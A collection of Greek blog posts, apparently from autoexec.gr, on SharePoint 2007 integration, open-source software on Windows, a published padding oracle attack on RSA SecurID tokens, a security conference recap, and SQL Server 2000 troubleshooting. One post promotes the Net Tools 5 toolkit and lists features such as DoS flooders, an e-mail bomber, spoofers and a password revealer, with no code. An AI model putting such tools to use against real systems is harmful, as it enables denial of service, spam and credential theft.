    Σε άλλη δημοσίευση μου είχα αναφερθεί σε ifilters (τα οποία υπάρχουν σε σελίδες όπως το MySpace), στην περίπτωση του SharePoint τα πράγματα είναι πιο απλά. Χρησιμοποιεί τα συγκεκριμένα plugins για να μπορεί να κάνει index τα αρχεία και συνεπώς να είναι αναζητήσημα από το σχετικό search. Αντίστοιχα ifilters για search χρησιμοποιούνται και στο Windows Desktop Search, στον SQL server κλπ


    Protocol handlers :


    Οι συγκεκριμένοι handlers αυτό που κάνουν είναι να ανοίγουν content sources (δηλαδή τα περιεχόμενα κάποιου τρίτου συστήματος) μέσω των κύριων πρωτοκόλλων τους (ασχέτως συστήματος) και στην συνέχεια καθιστά όλα τα έγγραφα και λοιπά στοιχεία δυνατόν να φιλτραριστούν.


    Custom Development :


    Ο Office SharePoint Server 2007 είναι κατασκευασμένος σε .NET Framework 2.0 και αυτό εμπεριέχει native support για XML και Web services. Οι developers μπορούν να δημιουργούν custom εφαρμογές για να ‘τραβάνε’ data σε κάποιο έγγραφο και ουσιαστικά να αλληλεπιδρούν με back-end συστήματα. Αυτό επιτυγχάνετε με διάφορους τρόπους είτε με την χρήση web services, ή μέσω άλλων custom adapters, ή ακόμα και βασικών πρωτοκόλλων όπως είναι RSS.


    BizTalk Server and Host Integration Server

     :
    Τα παραπάνω ‘εργαλεία’ (Microsoft BizTalk Server and Microsoft Host Integration Server) μπορούν να ‘ανεβάσουν’ την λύση του SharePoint σε υψηλότερα ακόμα επίπεδα, δημιουργώντας ακόμα πιο πλούσιες λύσεις και ταυτόχρονα μειώνοντας την πολυπλοκότητα του data integration. Η Microsoft είναι εδώ…



     

    ΔΟΚΙΜΑΣΜΕΝΑ ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ ΚΑΙ BROWSERS ΜΕ ΤΟ OFFICE SHAREPOINT SERVER 2007



    Scenario


    Operating System


    Browser


    Full Admin:System Admin, Forms Admin


    Windows 98, Windows ME, Windows 2000, Windows XP, Windows Server 2003, Windows Vista


    Internet Explorer 6.x,  Internet Explorer 7


    User:Site Admin, Site Usage, Forms Filling


    Windows 98, Windows ME, Windows 2000,
    Windows XP, Windows Server 2003, Windows Vista


    Firefox 1.5, Mozilla 1.7, Netscape 7.2


    User:Site Admin, Site Usage, Forms Filling


    UNIX/Linux


    Firefox 1.5, Netscape 7.2


    User:Site Admin, Site Usage, Forms Filling


    Mac OS-X


    Firefox 1.5, Safari 2.0



     

    ΛΙΣΤΑ ΕΤΑΙΡΕΙΩΝ-ΣΥΣΤΗΜΑΤΩΝ ΠΟΥ ΣΥΝΕΡΓΑΖΟΝΤΑΙ OUT OF THE BOX ΜΕ ΤΟ OFFICE SHAREPOINT SERVER 2007



    Business Application


    Solution Provider (search, migration, integration)


    ADERANT


    Handshake Software


    Baan


    BA-Insight


    BEA PlumTree


    Tzunami


    Documentum (EMC)


    Casahl, EMC, KnowledgeLake, Metalogix, Tzunami, Vorsite


    Dynamics


    Microsoft


    EMC Centera


    EMC, Meridio, KnowledgeLake


    eRoom (EMC)


    Metalogix, Tzunami


    FileNet (IBM)


    Casahl, KnowledgeLake, Metalogix, Tzunami, Vorsite


    HyperWave


    Tzunami


    IBM Workplace


    Metalogix


    InterAction


    Handshake Software


    Interwoven


    Casahl, Metalogix, XMLAW, Interwoven, | Handshake Software


    JD Edwards


    BA-Insight


    LiveLink ECM eDOCS DM (PC DOCS / Open Text)


    Handshake Software


    Livelink ECM eDOCS (Hummingbird / Open Text)


    Casahl, itsystems AG, KnowledgeLake, Metalogix, Open Text, Tzunami, XMLAW, Handshake Software


    Lotus Notes/Domino (IBM)


    Casahl, Metalogix, Proposion, Tzunami


    Meridio


    Meridio


    Mobius ViewDirect


    Mobius


    OnBase


    Hyland


    Oracle Financials


    BA-Insight


    PeopleSoft


    BA-Insight


    Plumtree


    Tzunami


    SAP


    Casahl, BA-Insight, ERP-Link


    Siebel


    Vorsite, BA-Insight


    Stellent


    Casahl, KnowledgeLake, Metalogix


    Thomson Elite


    Handshake Software


    Vignette


    Casahl, Metalogix, Vignette


     

    Τι έχετε να πείτε; Δουλεύει με όλα και συμφέρει...


     


     


     
  18. Blackman
    Σε συνέχεια του σχετικού άρθρου http://autoexec.gr/blogs/blackman/archive/2010/02/18/microsoft-platinum-sponsor-open-source-business-conference.aspx
    όπου η Microsoft ήταν σπόνσορας στο Open Source Business Conference 2010, ήρθε μία ενδιαφέρουσα έρευνα. Στο ίδιο συνέδριο υπήρχε και παρουσία του Geeknet το οποίο εμπεριέχει στο δίκτυο του τα SourgeForge, Shlashdot, ThinkGeek, Ohloh και το Freshmeat. Οι περισσότεροι νομίζω ότι γνωρίζετε τις συγκεκριμένες ιστοσελίδες, οι οποίες είναι άμεσα συνδεδεμένες με ότι έχει να κάνει με Open Source και γενικά όλα τα ανοιχτά πρότυπα.
    Η Geeknet έκανε μία έρευνα για την Microsoft για να δουν σε τι ποσοστό τα Open Source προγράμματα δουλεύουν και σε πλατφόρμες της Microsoft. Το ενδιαφέρον στην συγκεκριμένη περίπτωση (το οποίο μου προκάλεσε και εμένα κάποια εντύπωση) είναι ότι παρόλο που τα τελευταία χρόνια η χρήση των Open Source λειτουργικών (λέγε με Linux) έχουν ανέβει κατά πολύ, την ίδια ώρα τα Open Source προγράμματα που τρέχουν και σε Windows έχουν ανέβει σε αριθμούς επίσης. Η έρευνα έδειξε ότι από το σύνολο των Open Source προγραμμάτων, το 2005 72% από αυτά ‘έπαιζαν’ και σε Windows, ενώ το 2009 το νούμερο αυτό είναι στο 82%.

    Αυτό ουσιαστικά τι σημαίνει; Ότι από τα 433.000 Open Source προγράμματα που υπάρχουν στο Geeknet αυτή την στιγμή, 350.000 από αυτά είναι συμβατά με τα Windows. Φυσικά για εκείνους που παρακολουθούν την εξέλιξη και την εμπλοκή της Microsoft στο Open Source και στο Interoperability κομμάτι τα τελευταία 8 χρόνια μόνο τυχαίο δεν μπορεί να χαρακτηριστεί το νούμερο. Καθώς εκτός του ότι έχει βοηθήσει στην ανάπτυξή Open Source εφαρμογών, αλλά ακόμα και του πυρήνα του Linux, έχει χρησιμοποιήσει και ανοιχτό κώδικα σε κάποια από τα προϊόντα της.
    http://port25.technet.com/archive/2008/11/07/open-source-interoperability-projects-at-microsoft.aspx
    http://port25.technet.com/archive/2009/09/29/contribution-without-a-thud.aspx
    http://www.microsoft.com/presspass/features/2009/jul09/07-20linuxqa.mspx
    http://news.softpedia.com/news/Forget-Windows-7-Microsoft-Helps-Linux-Grow-117149.shtml
    http://blogs.computerworld.com/dear_microsoft_thanks_for_the_help_linux
    (Για να διαβάσετε καλύτερα τον παραπάνω πίνακα θα αναφέρω τα εξής:
    POSIX = Portable Operating Systems Interface for Unix
    συνεπώς μιλάμε για τα Open Source projects που είναι για συστήματα με Unix APIs (δλδ Linux & Unix)
    Platform Agnostic = ουσιαστικά Open Source projects που μπορούν και ‘τρέχουν’ σε όλα τα συστήματα)
    Συνεχίζοντας ένα ακόμα ενδιαφέρον στοιχείο είναι ότι από το 2005 πολύ μεγάλο ποσοστό των νέων Open Source projects είναι Operating System Agnostic και φυσικά αυτό υποστηρίζεται από το γεγονός των ευρέως διαδεδομένων scripting languages και των σχετικών runtimes (όπως αναφέρει η Geeknet).

    Ένα ακόμα πιο ενδιαφέρον χαρακτηριστικό είναι ότι το TOP 10 των πιο πολυκατεβασμένων (αυτό είναι το most downloaded) Open Source προγραμμάτων στο SourgeForge είναι ΜΟΝΟ για Windows. Τα προγράμματα αυτά είναι τα εξής: eMule, Azureus/Vuze, Ares Gallery, 7-Zip, Filezilla, GTK+ and Gimp Installer για Windows, Audacity, PortableApps.com: Portable Software/USB, DC++, και BitTorent.
    Ενώ η έρευνα δείχνει ότι αν δούμε το TOP 25, εκεί θα βρούμε 23 προγράμματα που τρέχουν σε Windows από τα οποία τα 14 είναι αποκλειστικά για Windows.
    Πολύ ενδιαφέρον δεν βρίσκετε;
    πηγή: port25 & geeknet
  19. Blackman
    SecurID ή πιο ολοκληρωμένα RSA SecureID είναι ένας μηχανισμός ασφαλείας για Two Factor Authentication το οποίο δημιουργήθηκε από το Security Division της EMC. Η λειτουργία του, όπως και αντίστοιχων μηχανισμών είναι κοινώς γνωστή και μέχρι τώρα πιστεύαμε ότι ήταν και η πιο ασφαλής.
    Το Μάρτιο του 2011 η RSA ανακοίνωσε ότι έπεσε θύμα μία πολύ εξειδικευμένης και επιδευμένης επίθεσης με αποτέλεσμα να χάσουν κάποια δεδομένα. Αν και τότε περιμέναν ότι από οικονομικής άποψης δεν θα υπήρχε κάποιο πρόβλημα με την εταιρεία, αυτή η διαρροή κόστισε στην μαμά εταιρεία EMC 66,3εκατ. δολάρια (για να ερευνήσουν το θέμα, για να κάνουν καλύτερη την ασφάλεια τους κλπ).

    Ένα μήνα μετά η L3-Communications δέχεται επίθεση λόγο της επίθεσης στην RSA, αν και αυτό δεν έχει ακόμα επιβεβαιωθεί. Δύο μήνες μετά την αρχική επίθεση και συγκεκριμένα τον Μάιο του 2011 η πασίγνωστη εταιρεία Lockheed Martin πέφτει θύμα επιθέσεων για τον ίδιο λόγο.

    Παρόλο που οι υπεύθυνοι ενημέρωσαν ότι το προσωπικό ασφαλείας τους κατάφερε και μείωσε στο ελάχιστο την διαρροή λόγο της επίθεσης, το αμερικανικό υπουργείο αμύνης προσέφερε βοήθεια για να μελετηθεί το μέγεθος της επίθεσης αλλά και των όποιων ζημείων.
    Γίνεται κατανοητό ότι το RSA SecurID χρησιμοποιείτε από πολλές και τεράστιου μεγέθους εταιρείες παγκοσμίως. Τέτοια συστήματα δίνουν για λόγους ασφαλείας στους υπαλλήλους τους ώστε να επιτευχθεί το μεγαλύτερο επίπεδο σιγουριάς στα δεδομένα τους.


    Μία ομάδα επιστημόνων (Romain Bardou, Lorenzo Simionato, Graham Steel, Joe-Kai Tsay, Riccardo Focardi, Yusuke Kawamoto) όμως, πρόσφατα (25/6/2012) εξέδωσαν μία εργασία/ανάλυση με όνομα “Efficient padding oracle attacks on cryptographic hardware”. (κλικ για να την δείτε). Όπου αναλύουν όλα τα vulnerabilities που έχουν όλοι οι μηχανισμοί που χρησιμοποιούν το PKCS#11 standard. Το συγκεκριμένο χρησιμοποιείτε από δίαφορες εφαρμογές και συστήματα όπως ο Mozilla Firefox, OpenSSL, Solaris κλπ.
    Η ομάδα αυτή κάταφερε να δημιουργήσει μία “επίθεση”, μέσω της οποίας χρειάζεται περίπου 13 λεπτά να σπάσει κάποιος το encryption ενός RSA SecurID 800 token (και όχι μόνο).

    Η RSA Security στην παρούσα φάση αναφαίρει ότι ερευνά το report των εν λόγω επιστημόνων για το πόσο ισχύει αυτό που ισχυρίζονται.
    http://www.net-security.org/secworld.php?id=13168
    http://www.bostonglobe.com/business/2012/06/26/rsa-defends-flagship-product/ixvjQ37bqWZjgU70G1Qo3H/story.html
    Η επίθεση που ονομάζεται “million message attack” χρειάζεται συνήθως 215000 queries για να αποκαλυφθεί ένα κλειδί 1024bit. Η μέθοδος που αναλύεται στην αναφορά της ομάδας αυτής βελτιώνει τον αλγόριθμο της συγκεκριμένης επίθεσης και χρειάζεται μόνο 9400 queries για να επιτύχει το ίδιο αποτέλεσμα. Η επίτευξη αυτού έγινε με την χρήση ενός θεωρήματος που τους επιτρέπει να χρησιμοποιούν και διαιρέσεις (πέραν των πολλαπλασιασμών) για τον υπολογισμό ενός PKCS# v1.5 cipthertext ώστε να μετατραπεί σε plain text.

    Στην λίστα των συσκευών που φαίνεται ότι είναι στόχοι-θύματα της εν λόγο τεχνικής θα βρούμε:
    SafeNet iKey USB 2032

    Aladdin eToken Pro

    Siemens CardOS

    Gemalto CyberFlex (το οποίο χρειάζεται με την ίδια τεχνική 92 λεπτά για να σπάσει)

    καθώς επίσης στην λίστα είναι και οι ηλεκτρονικές Ταυτότητες της Εσθονίας οι οποίες χρησιμοποιούν δύο ζεύγη από RSA keys.


    Ποια είναι η γνώμη σας;
  20. Blackman
    Εντυπωσιασμένος από αυτά που μάθαμε στο SecurityForum που μόλις τελείωσε (δυστυχώς), παρατηρούσα εμείς εδώ στο autoexec.gr τι έχουμε αναφέρει για το θέμα που έχει να κάνει με την προστασία. Έχουμε αναφέρει αρκετά πράγματα που οι φίλοι μας Andy και Marcus μας είπα αυτές τις δύο ημέρες.

    Να δούμε τι ήταν αυτά και τι έχουμε πει εμείς εδώ μέσα;

    1) Μας ανέφεραν για πολλά εργαλεία για να προστατευθούμε, να μαζέψουμε πληροφορίες και γενικά να σκεφτόμαστε σαν ένας hacker. Μα και εμείς είχαμε αναφέρει ένα από τα πιο δυνατά εργαλεία για να γίνει αυτό. Μιλάω για το Backtrack (ναι ναι...ξέρω ότι ευλογώ τα μούσια μου) το οποίο περιέχει το 90% των εργαλείων που αναφέρθηκαν στο forum. Διαβάστε ΕΔΩ

    2) Μας ανέφεραν επίσης για το ότι δεν πρέπει να βάζουμε τις πληροφορίες μας στο Internet και αν αυτό συμβαίνει, ας είναι όσο λιγότερες γίνεται. Ειδικότερα οι πληροφορίες που μπορεί κάποιος να μαζέψει μέσω Social Networking sites (όπως το Facebook) είναι πάρα πολλές. Ρίξτε μία ματιά ΕΔΩ

    3) Φυσικά μας έκαναν και μία επίδειξη exploit που ήταν άκρως εντυπωσιακό, αλλά και ο φίλος μας ο spanougakis μας είχε αναφέρει και μας είχε δείξει και από κοντά με τον ίδιο τρόπο. Για να σας θυμήσω απλά δείτε ΕΔΩ

    4) Μήπως δεν μας είπαν και για το BitLocker των Vista που ο φίλτατος frees (α ρε ξαδερφάκι) έχει αναφέρει ΕΔΩ?

    5) Η μήπως δεν μας ανέφεραν για Certificates (PKI κλπ) που ο φίλος dimitris έχει ξεκινήσει και αναλύει ΕΔΩ και ΕΔΩ?

    6) Ένα από τα πράγματα που ακούσαμε είχαν να κάνουν και με τα ασύρματα δίκτυα τα οποία αναφέρει ο spanougakis ΕΔΩ

    7) Ενώ ένα ακόμα πράγμα που ακούσαμε αρκετές φορές είχαν να κάνουν με τις πολιτικές δικτύου. Αλλά και εγώ είχα αναφέρει για κάτι σχετικό ΕΔΩ για να περιορίσουμε τους χρήστες να κάνουν "λάθη" ή κακόβουλες κινήσεις, που όπως μάθαμε φέρουν το μεγαλύτερο ποσοστό security breach ενός δικτύου.

    8) Τέλος, για την μικρή αναφορά μου να πω και για τον Hyper(visor)-Vangelis που έχει γράψει για τον 2008 RC2, και μας ανέφεραν επίσης οι φίλοι μας Andy & Marcus, το οποίο μπορείτε να διαβάσετε ΕΔΩ

    Φυσικά, αυτά απλά είναι ένα μικρό μέρος από αυτά που είδαμε και μάθαμε από τους φίλους μας, αλλά θεώρησα σωστό να αναφέρω το τι έχουμε γράψει εδώ μέσα, γιατί κατά την γνώμη μου προχωράμε σε ένα σωστό δρόμο. Πραγματικά το SecurityForum άξιζε τα λεφτά του και με έκανε να δω αρκετά πράγματα με άλλο μάτι. Νομίζω ότι το όλο συναίσθημα που μου άφησε αυτό το διήμερο ήταν πολύ δυνατό και με έκανε να αγαπήσω περισσότερο αυτό που κάνω.

    Ανυπομονώ για το επόμενο και έχω ήδη καεί στην προσπάθεια να εφαρμόσω ότι έμαθα σε συνδιασμό με ότι ήξερα.

    Autoexec.gr RULEZ
  21. Blackman
    Μετά από το πολυσυζητημένο και άκρως πετυχημένο event του Autoexec.gr με όνομα Security Forum 2008, πολλοί από εμάς μπήκαμε στην αναζήτηση εργαλείων που θα μπορούσαν να μας κάνουν την ζωή ευκολότερη στην προσπάθεια μας να έλέγξουμε το εταιρικό μας δίκτυο.

    Προσωπικά χρησιμοποιώ το BackTrack 3.0 με το οποίο παρακολουθώ και κάνω τις δοκιμές μου πάνω στο δίκτυο. Στο σύστημα των Windows όμως στο οποίο δουλεύω έχω εγκαταστήσει κάποια εργαλεία για να έχω τέτοιου είδους διαχείριση και από εκεί, όταν βαριέμαι να μπω από το BackTrack.

    Ώς γνωστόν τα περισσότερα τέτοιου είδους εργαλεία είναι free, έτσι και εγώ πήρα φόρα και έβαζα προγράμματα.



    Nmap
    Nessus
    Wireshark
    Network Stumbler
    Maltego
    Aicrack
    Είναι κάποια προγράμματα που 'μπήκαν' στο σύστημα μου και τα οποία είναι καταπληκτικά για αυτή την δουλειά.
    Παρόλα αυτά ήρθαν κάποιες στιγμές που λόγω της χρήσης του BackTrack κατάλαβα ότι χρειαζόμουν και κάτι παραπάνω για να κάνω αυτό που θέλω.
    Τότε θυμήθηκα ότι παλαιότερα είχα χρησιμοποιήσει ένα πρόγραμμα που είχε αρκετές από τις επιλογές που ζητούσα.
    Έψαξα αυτό το πρόγραμμα, το βρήκα και το εγκατέστησα.

    Το όνομα αυτού; Net Tools 5



    Το Net Tools 5 είναι ένα free εργαλείο σχεδιασμένο για την προστασία και την παρακολούθηση τόσο του Internet αλλά και εταιρικών δικτύων.
    Τι προσφέρει;



    Αυτά...
    1) IP Address Scanner
    2) IP Calculator
    3) IP Converter
    4) Port Listener
    5) Port Scanner
    6) Ping
    7) NetStat (2 ways)
    8) Trace Route (2 ways)
    9) TCP/IP Configuration
    10) Online - Offline Checker
    11) Resolve Host & IP
    12) Time Sync
    13) Whois & MX Lookup
    14) Connect0r
    15) Connection Analysator and protector
    16) Net Sender
    17) E-mail seeker
    18) Net Pager
    19) Active and Passive port scanner
    20) Spoofer
    21) Hack Trapper
    22) HTTP flooder (DoS)
    23) Mass Website Visiter
    24) Advanced Port Scanner
    25) Trojan Hunter (Multi IP)
    26) Port Connecter Tool
    27) Advanced Spoofer
    28) Advanced Anonymous E-mailer
    29) Simple Anonymous E-mailer
    30) Anonymous E-mailer with Attachment Support
    31) Mass E-mailer
    32) E-mail Bomber
    33) E-mail Spoofer
    34) Simple Port Scanner (fast)
    35) Advanced Netstat Monitoring
    36) X Pinger
    37) Web Page Scanner
    38) Fast Port Scanner
    39) Deep Port Scanner
    40) Fastest Host Scanner (UDP)
    41) Get Header
    42) Open Port Scanner
    43) Multi Port Scanner
    44) HTTP scanner (Open port 80 subnet scanner)
    45) Multi Ping for Cisco Routers
    46) TCP Packet Sniffer
    47) UDP flooder
    48) Resolve and Ping
    49) Multi IP ping
    50) File Dependency Sniffer
    51) EXE-joiner (bind 2 files)
    52) Encrypter
    53) Advanced Encryption
    54) File Difference Engine
    55) File Comparasion
    56) Mass File Renamer
    57) Add Bytes to EXE
    58) Variable Encryption
    59) Simple File Encryption
    60) ASCII to Binary (and Binary to ASCII)
    61) Enigma
    62) Password Unmasker
    63) Credit Card Number Validate and Generate
    64) Create Local HTTP Server
    65) eXtreme UDP Flooder
    66) Web Server Scanner
    67) Force Reboot
    68) Webpage Info Seeker
    69) Bouncer
    70) Advanced Packet Sniffer
    71) IRC server creater
    72) Connection Tester
    73) Fake Mail Sender
    74) Bandwidth Monitor
    75) Remote Desktop Protocol Scanner
    76) MX Query
    77) Messenger Packet Sniffer
    78) API Spy
    79) DHCP Restart
    80) File Merger
    81) E-mail Extractor (crawler / harvester bot)
    82) Open FTP Scanner
    83) Advanced System Locker
    84) Advanced System Information
    85) CPU Monitor
    86) Windows Startup Manager
    87) Process Checker
    88) IP String Collecter
    89) Mass Auto-Emailer (Database mailer; Spammer)
    90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
    91) Fishing Port Scanner (with named ports)
    92) Mouse Record / Play Automation (Macro Tool)
    93) Internet / LAN Messenger Chat (Server + Client)
    94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
    95) Hash MD5 Checker
    96) Port Connect - Listen tool
    97) Internet MAC Address Scanner (Multiple IP)
    98) Connection Manager / Monitor
    99) Direct Peer Connecter (Send/Receive files + chat)
    100) Force Application Termination (against Viruses and Spyware)
    101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
    102) COM Detect and Test
    103) Create Virtual Drives
    104) URL Encoder
    105) WEP/WPA Key Generator
    106) Sniffer.NET
    107) File Shredder
    108) Local Access Enumerater
    109) Steganographer (Art of hiding secret data in pictures)
    110) Subnet Calculater
    111) Domain to IP (DNS)
    112) Get SNMP Variables
    113) Internet Explorer Password Revealer
    114) Advanced Multi Port Scanner
    115) Port Identification List (+port scanner)
    116) Get Quick Net Info
    117) Get Remote MAC Address
    118) Share Add
    119) Net Wanderer
    120) WhoIs Console
    121) Cookies Analyser
    122) Hide Secret Data In Files
    123) Packet Generator
    124) Secure File Splitting
    125) My File Protection (Password Protect Files, File Injections)
    126) Dynamic Switch Port Mapper
    127) Internet Logger (Log URL)
    128) Get Whois Servers
    129) File Split&Merge
    130) Hide Drive
    131) Extract E-mails from Documents
    132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
    133) Hook Spy
    134) Software Uninstaller
    135) Tweak & Clean XP
    136) Steganographic Random Byte Encryption
    137) NetTools Notepad (encrypt your sensitive data)
    138) File Encrypter/Decrypter
    139) Quick Proxy Server
    140) Connection Redirector (HTTP, IRC, ... All protocols supported)
    141) Local E-mail Extractor
    142) Recursive E-mail Extractor
    143) Outlook Express E-mail Extractor
    144) Telnet Client
    145) Fast Ip Catcher
    146) Monitor Host IP
    147) FreeMAC (MAC Address Editor)
    148) QuickFTP Server (+user accounts support)
    149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
    150) Network Protocol Analyzer
    151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
    152) WebMirror (Website Ripper)
    153) GeoLocate IP
    154) Google PageRank Calculator
    155) Google Link Crawler (Web Result Grabber)
    156) Network Adapter Binder
    157) Remote LAN PC Lister
    158) Fast Sinusoidal Encryption
    159) Software Scanner
    160) Fast FTP Client
    161) Network Traffic Analysis
    162) Network Traffic Visualiser
    163) Internet Protocol Scanner
    164) Net Meter (Bandwidth Traffic Meter)
    165) Net Configuration Switcher
    166) Advanced System Hardware Info
    167) Live System Information
    168) Network Profiler
    169) Network Browser
    170) Quick Website Maker and Web Gallery Creator
    171) Remote PC Shutdown
    172) Serial Port Terminal
    173) Standard Encryptor
    174) Tray Minimizer
    175) Extra Tools (nmap console & win32 version)





    Εντυπωσιαστήκατε; Το Net Tools 5 είναι κατασκευασμένο για λειτουργικά συστήματα της Microsoft και ίσως να είναι και το μοναδικό 'πακέτο' εργαλείων security που δεν υπάρχει σε έκδοση για Linux.


    Μπορείτε να κατεβάσετε το πρόγραμμα από Ε Δ Ω
    Αλλά να ξέρετε ότι θα χρειαστεί να έχετε εγκατεστημένο το .NET Framework.

    Και να μην ξεχνάτε...Trust No One...Scan Everything...
  22. Blackman
    Πρωί πρωί στο γραφείο και πριν ξεκινήσω να μπω σε πλήρης ρυθμό δουλειάς, κάνω τις συνηθισμένες κινήσεις μου σερφάροντας και αναζητώντας κάποιο νέο και τσουπ...πέφτω πάνω του.

    Δεν είχα ακούσει κάτι, δεν το διάβασα πουθενά, αλλά στο Technet υπάρχει με ημερομηνία 4/3/2009.

    Ωραία νέα.

    Για να κάνετε εγκατάσταση, πρέπει να απομακρύνετε όποια προηγούμενη beta έκδοση του SP2 αν έχετε βάλει. Στην περίπτωση του Windows Server 2008 είναι το πρώτο post-release Service Pack που κυκλοφορεί.

    Και επειδή εμείς πρέπει να το δοκιμάσουμε πρώτοι, ας το βάλουμε, καθώς όπως αναφέρει και η Microsoft "This pre-release software is provided for testing purposes only".

    Όπως και να έχει, πριν κάνετε κάποια κίνηση διαβάστε ΑΥΤΟ πρώτα και μετά πηγαίνετε ΕΔΩ για να το κατεβάσετε.

    Αν δείτε προβλήματα, μπορείτε να στείλετε 234875234 emails με παράπονα στον Κλαδάκη.
  23. Blackman
    Όλοι ξέρουμε τον Microsoft SQL Server 2000.

     
    Οι περισσότεροι ξέρουμε το Business ERP της Singular Logic.

     
    Κάποιοι ξέρουμε και κάποιο Warehouse Management σύστημα.

     
     
    Θα σας διηγηθώ μέσω αυτού του άρθρου την διαδικασία εγκατάστασης ενός WMS συστήματος σε μία εταιρεία που δουλεύει με το Business ERP σε SQL 2000.
     
    Ας ξεκινήσουμε όμως με την απλή ερώτηση. Γιατί SQL server 2000 και όχι 2005 (ή 2008)? Πολύ απλά γιατί η εταιρεία έχει αγοράσει τον 2000 και δεν θέλει να διαθέσει λεφτά για αγορά του 2005 ή γιατί μας αρέσει καλύτερα ο 2000 (μας θυμίζει τα παλιά).
     
    Η επιλογή του ERP στο συγκεκριμένο άρθρο έχει γίνει λόγω ότι το πρόβλημα που θα περιγράψω μεταξύ αυτών των τριών συστημάτων είναι και αυτό που έζησα.
     
    Αρχική Κατάσταση
     
    SQL server 2000 (χωρίς Service Pack) εγκατεστημένο σε Windows 2003 server. (database server)
    Οι βάσεις του Business ERP βρίσκονται σε αυτόν τον server, ενώ το application κομμάτι βρίσκετε σε άλλο server.
    Με αυτό το configuration τα πάντα δουλεύουν κανονικά και χωρίς πρόβλημα.
     
    Παρατηρήσεις: Εγκατάσταση του SP δεν είχε γίνει καθότι στις θεωρούμενες μεγάλες εγκαταστάσεις του Business ERP ο SQL 2000 βγάζει προβλήματα αν έχει εγκατεστημένο SP (το SP4 συγκεκριμένα). Το βασικό πρόβλημα είναι ότι κολλάει και δεν κάνει commit κάποια transactions, οπότε και όλο το σύστημα του ERP μέσα στην εταιρεία κολλάει αντίστοιχα. Το παραπάνω είναι επιβεβαιωμένο σε αρκετές εγκαταστάσεις με βάση το feedback που υπάρχει από εξωτερικούς συνεργάτες της Singular Logic.

    Στόχος

    Εγκατάσταση-προσάρτηση WMS συστήματος που συνδέεται με το ERP και χρησιμοποιεί φορητά τερματικά (pdas) για το scanning των barcodes των ειδών της αποθήκης.
     
    Βήματα που ακολουθήθηκαν
     
    Εγκατάσταση του WMS συστήματος σε ένα ξεχωριστό server με εγκατεστημένο τον IIS για να μπορεί να δουλεύει το management κομμάτι της εφαρμογής που γίνετε μέσω browser. Η WMS εφαρμογή είναι γραμμένη σε .NET.
    Παραμετροποίηση του σχετικού config αρχείου για να βλέπει τον database server.
    Δοκιμή της σύνδεσης που ακολουθείται με αποτυχία αυτής.
     
    Μετά από πολλές δοκιμές παρατηρείτε το ότι δεν υπάρχει σύνδεση με τον server σε κανένα επίπεδο. Ούτε με telnet, το οποίο δεν γίνετε ΟΥΤΕ τοπικά.
    Σκέψη; Εγκατάσταση του Service Pack 4 (πρόταση της εταιρείας με το WMS, σκέψη δική μας η εγκατάσταση του επόμενου διαθέσιμου SP). Αξίζει να σημειωθεί ότι στις ρυθμίσεις του SQL 2000 υπάρχουν δύο πρωτόκολλα επικοινωνίας, το TCP/IP και το named pipes. Με βάση την συγκεκριμένη εγκατάσταση ανακαλύψαμε ότι η εφαρμογή της Singular Logic χρησιμοποιεί κατά κύριο λόγο named pipes, το οποίο το βλέπεις απλά απομακρύνοντας το TCP/IP πρωτόκολλο, όπου η εφαρμογή και πάλι δούλευε, εν αντιθέσει όταν έγινε το αντίστροφο το ERP σταμάτησε να δουλεύει. (εφαρμογή developed 10+ χρόνια πριν)
     
    Μετά από Backup των βάσεων και detach όλων αυτών, γίνεται απεγκατάσταση του SQL 2000 και ξανά εγκατάσταση αυτού ώστε να έχουμε μία 'καθαρή' εγκατάσταση. Στην συνέχεια γίνεται εγκατάσταση του SP4, attach πάλι όλες τις βάσεις και δοκιμές. Όλα παίζουν κανονικά, ακόμα και το telnet.
     
    Συμπέρασμα 1: Σε εγκατάσταση Microsoft SQL Server 2000 χωρίς service packs εγκατεστημένα σε Windows 2003 server, το σύστημα δεν συμπεριφέρεται ορθά. Το ίδιο σενάριο το επιβεβαίωσα και σε Virtual Lab, όπου έχουμε Ping, έχουμε name resolution, δεν έχουμε telnet, δεν έχουμε connection από IIS, δεν έχουμε connection από Windows CE. Με την εγκατάσταση του SP4, η συμπεριφορά έρχεται στα σωστά επίπεδα, όπου όλοι οι τρόποι δοκιμών και επικοινωνίας επιτυγχάνουν.
    ΠΑΡΑΤΗΡΗΣΗ: Κατά την εγκατάσταση του SQL 2000 βγάζει ένα μήνυμα που σε προειδοποιεί ότι για να δουλέψει σωστά θέλει εγκατάσταση από SP3 και άνω. Οπότε καταλαβαίνετε ότι αυτά που αναφέρω, η Microsoft τα γνωρίζει ήδη.
     
    Επόμενο βήμα
    Μετά από όλες τις δοκιμές επικοινωνίας και κάποιων tests στα τερματικά, ξεκίνησε η κανονική λειτουργία του συστήματος WMS μαζί με το ERP και τα PDAs.
    Όλα δούλευαν κανονικά, καθώς η όλη διαδικασία εγίνε Σαββατοκύριακο. Προβλήματα υπήρχαν κάθε τόσο στα pdas που έχαναν τη σύνδεση με το web κομμάτι και διορθωνόταν το πρόβλημα με επανεκκίνηση. Το πρόβλημα που αναφερόταν είχε να κάνει με τα connections στον IIS. Λύση για το συγκεκριμένο ήταν να πάμε στο config αρχείο και να δηλώσουμε να αφήνει όλα τα connections (κακό για το performance) ώστε να γλυτώσουμε χρόνο.
     
    Επόμενο πρόβλημα; Μετά από 3 μέρες συνεχής δουλειάς ένα μήνυμα λάθους πάλι εμφανίστηκε και τα pdas έχασαν επικοινωνία με την βάση. Ούτε με επανεκκινήσεις δούλευε το σύστημα, αλλά μόνο με το να πας πάλι στα πρωτόκολλα επικοινωνίας του SQL 2000 και να αλλάξεις την προτεραιότητα τους και να βάλεις πρώτο το TCP/IP και αποτσεκάρεις το "Force protocol encryption" (αυτό μετά από 3 ημέρες δουλειάς και άλλες 2 ημέρες δοκιμών).
     

     
    Ένα ακόμα λάθος στο σύστημα του WMS λύθηκε με εγκατάσταση ενός νέου IIS πάνω στον SQL server και παραμετροποίηση όλων για να δουλέψει αυτή η αλλαγή.
     
    Στην συνέχεια όλα δουλεύουν κανονικά.
